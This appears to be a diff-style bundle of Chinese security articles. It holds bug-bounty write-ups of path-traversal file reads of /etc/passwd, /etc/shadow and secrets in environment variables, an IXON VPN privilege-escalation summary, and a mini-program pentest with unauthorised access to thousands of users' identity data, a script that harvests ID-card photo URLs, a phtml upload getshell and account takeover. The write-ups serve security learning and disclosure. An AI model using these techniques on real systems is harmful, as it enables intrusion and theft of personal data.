![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLlL2Hn3yWFDibrjKKibZxogVDgbggn3Fbfw6V3yoZs0PSYyNtcdvM3OpaPHUicKqKcQW1CLicWFbzicyA/640?wx_fmt=png&from=appmsg "")
afrog
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLlL2Hn3yWFDibrjKKibZxogV0HmZUc6vzAmJgvAdCYiaNR46fkT8ef4aGRu4FIggAqqicnicibE6gRkH5w/640?wx_fmt=png&from=appmsg "")
xray
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLlL2Hn3yWFDibrjKKibZxogV2zb4U19sibjw3ibNulJNb4Lon9dmNAfPCLyweWJnGsbau4eibm7nKIQZA/640?wx_fmt=png&from=appmsg "")
**05******
**修复建议**
1、关闭互联网暴露面或接口设置访问权限
2、
更新到版本 2.2.2.1 或更新的修补版本
**06******
**内部圈子介绍**
【Nday漏洞实战圈】🛠 
专注公开1day/Nday漏洞复现
 · 工具链适配支持
 ✧━━━━━━━━━━━━━━━━✧ 
🔍 资源内容
 ▫️ 整合全网公开
1day/Nday
漏洞POC详情
 ▫️ 适配Xray/Afrog/Nuclei检测脚本
 ▫️ 支持内置与自定义POC目录混合扫描 
🔄 更新计划 
▫️ 每周新增7-10个实用POC来源公开平台 
▫️ 所有脚本经过基础测试,降低调试成本 
🎯 适用场景 
▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 
▫️ 安全运维
✧━━━━━━━━━━━━━━━━✧ 
⚠️ 声明:仅限合法授权测试,严禁违规使用!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0beBCCyKGykkAazuPyvibgC0ooBGy9elQQ72f1WIB73UDYuPhx8cnCobvnOBdTcxmdwBbt2eAYIQ/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,142 @@
# Zer0 Sec团队-某SRC任意文件读取漏洞挖掘案例
原创 Syst1m Zer0 sec 2025-05-27 02:00
**Zer0 Sec**
**某SRC任意文件读取漏洞**
**案例详情**
宇宙无敌免责
本推文提供的信息、技术和方法仅用于教育目的。文中讨论的所有案例和技术均旨在帮助读者更好地理解相关安全问题,并采取适当的防护措施来保护自身系统免受攻击。
严禁将本文中的任何信息用于非法目的或对任何未经许可的系统进行测试。未经授权尝试访问计算机系统或数据是违法行为,可能会导致法律后果。
作者不对因阅读本文后采取的任何行动所造成的任何形式的损害负责,包括但不限于直接、间接、特殊、附带或后果性的损害。用户应自行承担使用这些信息的风险。
我们鼓励所有读者遵守法律法规,负责任地使用技术知识,共同维护网络空间的安全与和谐。
本文由Zer0 Sec团队的Juneha师傅讲师供稿
0x1 发现漏洞
- 一开始是在浏览器控制台网络请求处发现了个/getfile接口,通过查看url接口大致能看出是用于请求Json文件的
![88974-loxm4zw8bh.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYO18zJyuFkiaI7TUmGG1odo21ZSCS6mR6DmQm3QTF5CHuylE1M2VP16Ww/640?wx_fmt=png&from=appmsg "")
- 正常请求打开看一下URL响应内容,确实是用于加载json文件的
![42221-fb2qilwdod.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOPSJBWeWrjViaQMpebd3JvN6MbALXAwCWuiaJ189YkEJOyg4QUNO40bpQ/640?wx_fmt=png&from=appmsg "")
- 尝试在原有URL上添加一个内容发现会爆出真实路径在/var/pvc/category/下
![67834-052m10jah76t.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOUFkr31lr8PV8ey7zuB7aewHia9xBLOCX5639unckk8uXHdYLS8OvhVw/640?wx_fmt=png&from=appmsg "")
- 这里我是打算说试试看填个/etc/paasswd发现提示信息有误
![41959-yn8jqursd2f.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOEswmibr6drczCc1cfyRBUDnu29c2IIegAK2ibNu2eK3BbudlXsEwVSWQ/640?wx_fmt=png&from=appmsg "")
- 经过测试发现是要满足 abc.abc这种带点的文件名格式
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYO8NxO0RITib39jysOoAExCwTjnM1Nvy7icXhwsSZcicbQ6sKgXxXotug8Q/640?wx_fmt=png&from=appmsg "")
- 一开始想的是读取系统里面自带的符合条件的文件,然后我提取了系统里面自带的文件作为字典,这里成功读取到了证书文件啥的,但是读取这些文件也没有危害。
```
```
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOfb9ibffpAe4PaZtmQHRG2mgUHGVE8QfibiabQ64ldLzALcWib6HGZia5ib3Q/640?wx_fmt=png&from=appmsg "")
0x02任意文件读取
- 后面在本地环境里面测试一下,发现要满足这个条件并不难,找一个存在的且满足条件的文件夹然后利用../../去读取即可例如我这里创建了个test.dir来测试发现刚好能满足当前场景接下来只需要找到系统自带的满足条件的文件夹即可。
```
```
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOF4ib4JDthbbt1lxJQxiaKjiaGw17bFCsR94etnV344680jxUORQ2m1XIw/640?wx_fmt=png&from=appmsg "")
- 接下来在centos系统中通过find来筛选出满足条件的自带文件夹作为字典
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYODiav4oHzyAJvrazy7ic8wR7p8WQiajShiaQQZoXTcbdl1YSRt9b4DIuZHg/640?wx_fmt=png&from=appmsg "")
- 随后使用Burp去fuzz一下成功读取到了/etc/passwd文件
```
```
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOQptrmqn5RgvFlzib1LfqEg9EyBygqCjRyCvL8XZ0ZDmOWbTXIcwwJAw/640?wx_fmt=png&from=appmsg "")
- 尝试了一下读取 /etc/shadow发现可以读取但是没有密码信息那推测这个环境可能是个容器环境
```
```
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOP69gjSicx1hIgmvuOl8BLZMDvuUPpBTBz3UzZGEhaxSySGpqD6zib0GA/640?wx_fmt=png&from=appmsg "")
- 通过读取环境变量成功获取数据库跟使用的外部api服务的key等信息
![12851-6l4aml3dvtg.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOo02et1miaZI9LrdibZfJ7qqyRcWK6JbEx7TKKuttyHBn3gZyEOWHQQ4w/640?wx_fmt=png&from=appmsg "")
**团队课程简介**
详细介绍请访问以下链接:
https://www.yuque.com/syst1m-/blog/lc3k6elv0zqhdal3?singleDoc#
![image.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOEUapzzC1Kzaib0MJRSlKbTEgZftswEoHLKxySvib2MHXgFO9udvCzia3g/640?wx_fmt=png&from=appmsg "")
![image.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOzUxumQZMt3BCGgE9IfVl2oYUmRZEcl1yc5am4m9qJ5Q88ic1c4xPiaXA/640?wx_fmt=png&from=appmsg "")
🎉优惠详情
课程原价 1199 元,本次五一优惠力度空前,多重福利可叠加!
- 学生专属:如果你是大学生,凭借学生证,立减 100 元!知识提升,经济无负担,让你在校园就能为未来的职业发展储备力量。
- 两人成团:快拉上你的小伙伴一起学习!两人成团,每人再减 100 元。学习路上有伴,互相交流、共同进步,还能享受超值优惠,何乐而不为?
- B 站&&公众号粉丝福利:关注我们 B 站和公众号的粉丝们有福啦!凭 B 站和公众号关注截图(两个都要),立减 50元。感谢一路以来的支持这份专属福利请收好
**报名方式**
- 扫描以下二维码加绿泡泡,备注“报名课程”
![image.png](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOOk3rIuvmG5j4fJHpJrCjYOL0UMx9wnEE5qgQWHYxMEv20Y7Z8EGgupC1vUy65yGJR9tg8LANhlIg/640?wx_fmt=png&from=appmsg "")
- 外部交流群欢迎进群互相交流由于群人数超过了200只能邀请拉群可以关注公众号后台回复“加群”获取助手绿泡泡联系小助手邀请进群
![图片](https://mmbiz.qpic.cn/mmbiz_png/lSfs7HwzmOPQ0wFex2MNKbDRZ2sAzNCAMvALMuUhBbiazlVRN2P3ib3wPCuoMWibCUJvJNdAhBXKC6KHNBUWTr1vg/640?wx_fmt=png&from=appmsg "")

File diff suppressed because one or more lines are too long

View File

@ -1,8 +1,19 @@
# 发现与 IXON VPN 客户端相关的三个新漏洞,可导致本地权限提升 (LPE)
Ots安全 2025-05-21 11:19
Ots安全 2025-05-27 04:23
![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "")
本文详细披露了瑞典网络安全公司 Shelltrail 发现的 IXON VPN 客户端中的三个新漏洞CVE-2025-ZZZ-01、CVE-2025-ZZZ-02 和 CVE-2025-ZZZ-03这些漏洞可能导致 Windows 和 Linux 系统上的本地权限提升LPE
文章深入分析了漏洞的成因Linux 系统上的 CVE-2025-ZZZ-02 利用了可预测的临时文件路径(/tmp/vpn_client_openvpn_configuration.ovpn通过创建命名管道注入恶意 OpenVPN 配置实现 root 权限执行Windows 系统上的 CVE-2025-ZZZ-03 则利用 C:\Windows\Temp 目录中的竞争条件,允许攻击者覆盖配置文件以获得 SYSTEM 权限。
IXON 已通过将临时文件移至高权限目录的方式,在 1.4.4 版本中修复了 LPE 问题但第三个漏洞CVE-2025-ZZZ-01尚未公开修复细节。
文章还提供了漏洞的技术细节、攻击演示及修复建议,旨在帮助工业系统用户防范潜在的网络安全威胁。
本文将介绍在 IXON VPN 客户端中发现的三个新漏洞 CVE-2025-ZZZ-01、CVE-2025-ZZZ-02 和 CVE-2025-ZZZ-03。这些漏洞会导致 Windows 和 Linux 系统上的本地权限提升,此外还有一个相当有趣的 [已编辑]。
已为这些漏洞申请 CVE ID但由于资金有限且 MITRE 工作积压目前尚未分配。CVE ID 分配完成后,本文将立即更新。

View File

@ -0,0 +1,446 @@
# 实战SRC挖掘微信小程序渗透漏洞复盘
原创 神农Sec 神农Sec 2025-05-27 02:03
扫码加圈子
获内部资料
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/b7iaH1LtiaKWXLicr9MthUBGib1nvDibDT4r6iaK4cQvn56iako5nUwJ9MGiaXFdhNMurGdFLqbD9Rs3QxGrHTAsWKmc1w/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=png&wxfrom=13&wx_lazy=1&wx_co=1&tp=wxpic "")
#
网络安全领域各种资源EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章以及工具分享、前沿信息分享、POC、EXP分享。
不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。
#
文章作者:
一个想当文人的黑客
文章来源:
https://xz.aliyun.com/news/18037
![](https://mmbiz.qpic.cn/mmbiz_png/iabIwdjuHp2VkevXU9Iiad0pl0dnkk6GmAQNiaqmb1kKX2NGKhaGF7m8UicdyCp9agykgzj7pNN1oEw4b3QLvFbibzQ/640?wx_fmt=png&from=appmsg&wxfrom=13&wx_lazy=1&wx_co=1&tp=wxpic "")
****
**微信小程序渗透漏洞复盘**
##
## 声明
##
本文章所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
## 0x1 前言
##
哈喽师傅们这次又来给师傅们分享下最近的一个漏洞挖掘的一个过程这次跟着一个师傅学习然后自己动手去挖也是学习到了不了东西。这次要给师傅们分享的案例是一个微信小程序的案例这个小程序站点存在多个漏洞可以打其中最主要是知识点就是开始的一个数据包构造通过分析登录页面的数据包进行队里面的数据包构造找到一个敏感信息接口进而泄露了七千多个用户的sfz、xm、sjh等敏感信息。
然后利用这个泄露的接口来进一步漏洞挖掘扩大危害其中微信小程序文件上传漏洞还是多的小程序好多都没什么过滤的像还有逆天的危险小程序直接没有任何的过滤的也是存在的。这里也是直接打了一个getshell。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsB92EgfGpYrpVXEQywAeEK3zCWGfA0m3iaeQHBibjSBashBOEiaZAxsZ7Q/640?wx_fmt=png&from=appmsg "")
## 0x2 渗透测试
### 一、浅谈
这个EDU的小程序可以直接使用微信一键登录像我们平常在挖掘微信小程序的时候经常碰到这样的微信一键登录的功能点像这样的初衷就是为了方便我们使用但是越是方便其实对于安全来讲越是不安全的一个过程。
就比如常见的一键微信、手机号登录容易造成泄露SessionKey三要素泄露下面就分享一个我之前挖的一个小程序的微信一键登录泄露SessionKey三要素的一个漏洞。
可以看到这个数据包直接把SessionKey、iv以及加密字段三个部分全部泄露了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QskDWLYBZeDICN2a0ng3YKh7gxLb9JA1YlO8FOcmM7QuzqXyue4S1jKA/640?wx_fmt=png&from=appmsg "")
然后再使用Wx
_
SessionKey
_
crypt这个加解密的工具进行解密可以看到解密出来开始一键微信登录的手机号
工具下载链接:
https://github.com/mrknow001/wx
_
sessionkey
_
decrypt/releases
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsVfuMCfOP10oUtZNUtfIYlQSYtjSAQfXqNb3LLgHNSlKnE2j65yyEWA/640?wx_fmt=png&from=appmsg "")
那么我们是不是可以逆向修改手机号然后加密,再去替换,然后放包就可以登录别人的账户了呢
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QslwHgdSzV2JpSA7XhRcRECqmSJoOy10bvke6gZ3xKbB6Je0cKUWxadA/640?wx_fmt=png&from=appmsg "")
### 二、burpsuit数据包分析
首先通过微信搜索小程序,找到目标
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsGZNxyB8hcXzicoqtk8yDSZjR27A10JXnfFibIiabvFbCZsiaMCZicKsMHmQ/640?wx_fmt=png&from=appmsg "")
这里就再继续跟大家讲下这个小程序的挖掘过程吧,然后带师傅们一起看看这个数据包
这个数据包相信很多师傅们一眼就可以看出来这个是jeecg框架这里给师傅们总结下判断jeecg框架特征最简单的就是看数据包路径关键字比如/jeecg、/sys、/system等
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsibCPlabv9KAiaq2OKdKslFibKCtRorywvcDiaVjWY04K6VxxFvynZkCwLA/640?wx_fmt=png&from=appmsg "")
这里看到这个数据包利用id这里是我自己登录时候的id可以回显出一些三要敏感的信息比如身份证、姓名、手机号等信息
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1Qszic0jJsGytdnMOmyrpMUFE0U52QgxTSGM847S41RoqdG0iaC0J1f449A/640?wx_fmt=png&from=appmsg "")
然后我就想看看开始的历史数据包里面有没有泄露遍历查看id的路径获取大量的id然后去遍历从而获取大量的敏感信息然后在这个list的接口下面确实查到了很多的id
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QscUC7TqufcZ68iapIg5pvgYfwHHT1KH1uhpSBrslnuVvfZIMiaIe9yPXg/640?wx_fmt=png&from=appmsg "")
然后我这里就替换到刚才的查询敏感信息的接口去替换那个id值但是发现不行后面才知道这里对X-Access-Token值做了校验所以这里我们没有权限去访问
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1Qs1U4C7ZGRiahCJQFRMwduWL6PMbQOAwqZicg8sIZTtGVHwiaibuXW31AeQA/640?wx_fmt=png&from=appmsg "")
然后这里我开始想爆破这个JWT编码看看有没有JWT密钥然后再去构造JWT再去使用user
_
id值然后去编码抓包放包去遍历或者尝试登录别人的账户信息。
但是这里我使用无影这个工具没有爆破出来,于是就没有利用成功
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1Qsibd0YM502YgQx6Gv1GxmEj4Nt4z21R3tu5QH73bpERG9c7WZqK9Ut1w/640?wx_fmt=png&from=appmsg "")
但是这里我给师傅们推荐一篇文章是写JWT伪造实战小程序漏洞案例的文章写的蛮不错的
[ 一次完整的Jwt伪造漏洞实战案例  https://mp.weixin.qq.com/s/ITVFuQpA8OCIRj4wW-peAA](https://mp.weixin.qq.com/s?__biz=MzkzMzE5OTQzMA==&mid=2247485655&idx=1&sn=0598b4c4ba4ae8f0d3fa999818df5c7e&scene=21#wechat_redirect)
### 三、峰回路转
后来我又是回到了原始的页面那几个数据包中对这几个数据包中的路径进行了一个分析发现list参数好像都是进行一个数据汇总查看那么我们上面的数据包通过修改id不成功那么我们可不可以尝试使用修改接口参数修改成list的来进行一个未授权数据访问呢
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsTFgC3pHibXD8dEdrmjcTxXhqVoGZw5abSq3Jy0JdxY6D1KA2AyL3Kiaw/640?wx_fmt=png&from=appmsg "")
开始是把id参数和后面的先删掉然后发现不行后面再把后面添加list参数发现还是不行
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsrOlvCd5NCLGBlPWP2u5bvXa6VjfzATtBZcaGbKcuCYmvom8h0b9icQg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsPTBIbPdLTYibCMzA0Y0Lq5PSFwjAiab8QiajvXhebTMj3vib2C5ZP1AZ1Q/640?wx_fmt=png&from=appmsg "")
后来我就直接把前面的queryById参数删掉再在后面添加list参数从而就可以未授权访问敏感信息了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1Qs2YSSfWgPNlkxMy9tXsN3ntKDU894zHxkL3LfdwNCcveTAIUdqUvvGQ/640?wx_fmt=png&from=appmsg "")
且泄露的用户数据总共有7802条
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsxjaVmjZQ3HyKjJdxPEhAnicSZk966VvStHQbUEibtwaS5jw2iaPCMVibnA/640?wx_fmt=png&from=appmsg "")
这里再构造接口list?pageNo=1&pageSize=7802
,就可以看到所有的敏感用户信息了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsZqNPCdKbofKicoxudhhEzJSnOt0F9fevU8ndN5DpibktBO2CKVVaCicRA/640?wx_fmt=png&from=appmsg "")
### 四、再次突破
这里碰到了idPhotoF和idPhotoZ参数这两个参数我之前也是碰到过在很多的招聘平台遇到过就是需要我们认证信息上次个人身份证正反面
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsZc3TKrzFibxQlI5K5F1uLUiaYicicYNmp9UPkskt1PlFBka9yw5lh8mT9g/640?wx_fmt=png&from=appmsg "")
我们正常思路就是知道这个照片的路径就直接拼接数据包的host域名但是这里并没有成功,spring-boot的报错页面碰到这个师傅们也可以考虑使用曾哥的spring文件泄露扫描工具扫
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsujjUgzJ4ltRAss5rRIpXicdtKrbtb5KDWic9s4QZS6ltWcHlvjtxHnxQ/640?wx_fmt=png&from=appmsg "")
那么我们就得判断是不是路径的问题,那么我们怎么去找正确的文件存储的位置呢,下面就刚好看到了文件下载的功能点,点击尝试下载,然后看看数据包里面文件路径
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsCkblHwRg5icvjnicZZPZKoMaRaZmiaeSB9vrULdaiaQj76BFshG0kSVwPw/640?wx_fmt=png&from=appmsg "")
可以看到这个路径确实在数据包中,那么我们就可以把路径拼接在这里尝试下,看看能不能有照片回显
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsEm4WGfibc4txqIYEpQpWQQcWC67iaJdlLTRmIiaI8bq9b8Us464KrhicWw/640?wx_fmt=png&from=appmsg "")
这里直接拼接/download路径直接可以回显图片成功
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsBEicom2yFyc4hGstLwKV19ibWCDCkkcEdGZxNCZGsJqVgvjyrJEvCfpg/640?wx_fmt=png&from=appmsg "")
直接可以在浏览器拼接host访问得到身份证正面照片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsicicWfajLwqeD7F7oXukXicOqLiaCG2KRmvlCvYnkueB42nDVf4GdVRzkA/640?wx_fmt=png&from=appmsg "")
我们这里总共有7806张身份证正面照片的url路径这里我们就可以写个python脚本把他们从数据包中爬取出来然后再自动拼接到host域名上python脚本如下
```
import json# 假设你已经获取到了JSON数据这里我们直接使用你提供的JSON数据json_data = '''数据包内容'''# 解析JSON数据data = json.loads(json_data)# 基础URLbase_url = "https://host/路径"# 遍历每个用户拼接URL并打印for user in data:    id_photo_f = user.get("idPhotoF")    if id_photo_f:        full_url = base_url + id_photo_f        print(full_url)
```
### 五、文件上传漏洞
然后这里在测试在线申请功能点的时候,这里需要我们实名认证上传身份证照片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsdFIicIWkhb8yupeT3nzUeeSAWCE5X8ljPqw1IeoMMnyZXNdBvQaRyiaw/640?wx_fmt=png&from=appmsg "")
像碰到这样的文件上传功能点肯定得测试下文件上传看看有没有什么过滤试试打文件上传getshell差点也可以尝试打个存储型XSS漏洞
这里先尝试打个XSS漏洞看看有没有过滤发现没有且可以成功解析弹窗XSS漏洞
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsgGia2ich7VcbvoNcp6ZA8NntRfNic6K4eaeu11HYdDzF5P0qicY5d6tDlw/640?wx_fmt=png&from=appmsg "")
那么下面我们就可以尝试上传木马然后进行打下getshell传马之前我们得先看这个站点是什么语言写的使用插件看到是php语言写的网站
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsKI7ibFd8gPKelq82Gaa1QdEr5ibNibNBz5IKtmYN3agy98nDbVpicA1BKA/640?wx_fmt=png&from=appmsg "")
但是这里过滤了php但是没有过滤phtml且可以成功解析
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsHBGEpVRTy2BrrtEr6KDCvbMmh2encibLKCHMBQpmCMJic6gX4vGSYQpQ/640?wx_fmt=png&from=appmsg "")
这里我直接打一个phpinfo页面证明下危害即可
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsvGv21a4V6DulfS0V04zpovY8FIrLFNyeSHohLxb2Hcq4ichibwZOzIpw/640?wx_fmt=png&from=appmsg "")
### 六、越权
这里我们使用微信一键登录的时候并没有进行实名认证,所以点击下面的功能点的时候都会弹窗,需要我们进行实名认证
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsJXQgDkWm7MIyUMYD5FNHvHTJIEDiaXkkJaiaR7Vab4q4x3MDLibygyiagQ/640?wx_fmt=png&from=appmsg "")
那么这里我就在想,要是登录别人的账户是不是就可以使用这些功能,且可以看到别人的信息了,而且在开始登录的数据包构造路径中,我们拿到了好多用户的登录用户数据信息
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QshpCkHkp4L6MIZT2R6arz5MoicBPyic2IX0ib2BJTmxECE8qEVMrRfmEdg/640?wx_fmt=png&from=appmsg "")
下面我们先退回登录界面然后使用bp抓登录包然后修改用户登录信息用我们刚开始收集到的用户信息进行数据包替换然后看看能不能成功登录别人的账户
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsiaicRueGVzEmZDtPbWzlezpUrvNtAdO3zl9eHY1fiaT4oTE2ZRhVZvBvQ/640?wx_fmt=png&from=appmsg "")
可以看到我们这里直接就可以替换成功用户数据包,从而越权到别人的账户,从而打了一个水平越权漏洞
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsmemIwvpWiclPW2iaNUibon2DkHjicRCEa5geNLormEibK4968iaGiaLibMJZibg/640?wx_fmt=png&from=appmsg "")
既然可以水平越权那么我们是不是可以尝试下找到admin管理员权限的用户user数据然后进行替换越权登录呢下面就来找下发现确实存在admin管理员权限的用户然后就是按照上面的越权方式就可以成功登录到管理员的用户了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWVyicxYvEv1vYVI0xMu4S1QsYftibHeZwzX5CjPgQt6qmFTDicgnRibwwro19iat4T3WQQ1B7JMnIkypibA/640?wx_fmt=png&from=appmsg "")
## 0x3 总结
这里给师傅们总结下我们在进行漏洞挖掘过程中需要注意的细节比如我们在看到一个功能点多个数据包的时候我们需要去挨个分析里面的数据包构造进而分析数据包的走向去了解数据包的一个业务逻辑特别是微信小程序因为它本来就是程序简单所以对于防御和一些过滤来讲并没有特别的难甚至就比如这个小程序都可以文件上传直接getshell了。
到这里这篇文章就结束了,上面的漏洞案例就是给师傅们分享到这里了,还希望自己写的文章队师傅们有帮助哈!祝愿师傅们多挖洞,多过漏洞!
![](https://mmbiz.qpic.cn/mmbiz_png/iabIwdjuHp2VkevXU9Iiad0pl0dnkk6GmAQNiaqmb1kKX2NGKhaGF7m8UicdyCp9agykgzj7pNN1oEw4b3QLvFbibzQ/640?wx_fmt=png&from=appmsg&wxfrom=13&wx_lazy=1&wx_co=1&tp=wxpic "")
****
**内部圈子详情介绍**
我们是
神农安全
,点赞 + 在看
 铁铁们点起来,最后祝大家都能心想事成、发大财、行大运。
![](https://mmbiz.qpic.cn/mmbiz_png/mngWTkJEOYJDOsevNTXW8ERI6DU2dZSH3Wd1AqGpw29ibCuYsmdMhUraS4MsYwyjuoB8eIFIicvoVuazwCV79t8A/640?wx_fmt=png&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/MVPvEL7Qg0F0PmZricIVE4aZnhtO9Ap086iau0Y0jfCXicYKq3CCX9qSib3Xlb2CWzYLOn4icaWruKmYMvqSgk1I0Aw/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**内部圈子介绍**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/MVPvEL7Qg0F0PmZricIVE4aZnhtO9Ap08Z60FsVfKEBeQVmcSg1YS1uop1o9V1uibicy1tXCD6tMvzTjeGt34qr3g/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**圈子专注于更新src/红蓝攻防相关:**
```
1、维护更新src专项漏洞知识库包含原理、挖掘技巧、实战案例
2、知识星球专属微信“小圈子交流群”
3、微信小群一起挖洞
4、内部团队专属EDUSRC证书站漏洞报告
5、分享src优质视频课程企业src/EDUSRC/红蓝队攻防)
6、分享src挖掘技巧tips
7、不定期有众测、渗透测试项目一起挣钱
8、不定期有工作招聘内推工作/护网内推)
9、送全国职业技能大赛环境+WP解析比赛拿奖
```
**内部圈子**
**专栏介绍**
知识星球内部共享资料截屏详情如下
(只要没有特殊情况,每天都保持更新)
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWWYcoLuuFqXztiaw8CzfxpMibRSekfPpgmzg6Pn4yH440wEZhQZaJaxJds7olZp5H8Ma4PicQFclzGbQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/b7iaH1LtiaKWWYcoLuuFqXztiaw8CzfxpMibgpeLSDuggy2U7TJWF3h7Af8JibBG0jA5fIyaYNUa2ODeG1r5DoOibAXA/640?wx_fmt=png&from=appmsg "")
**知识星球——**
**神农安全**
星球现价 
¥45元
如果你觉得应该加入,就不要犹豫,价格只会上涨,不会下跌
星球人数少于800人 45元/年
星球人数少于1000人 60元/年
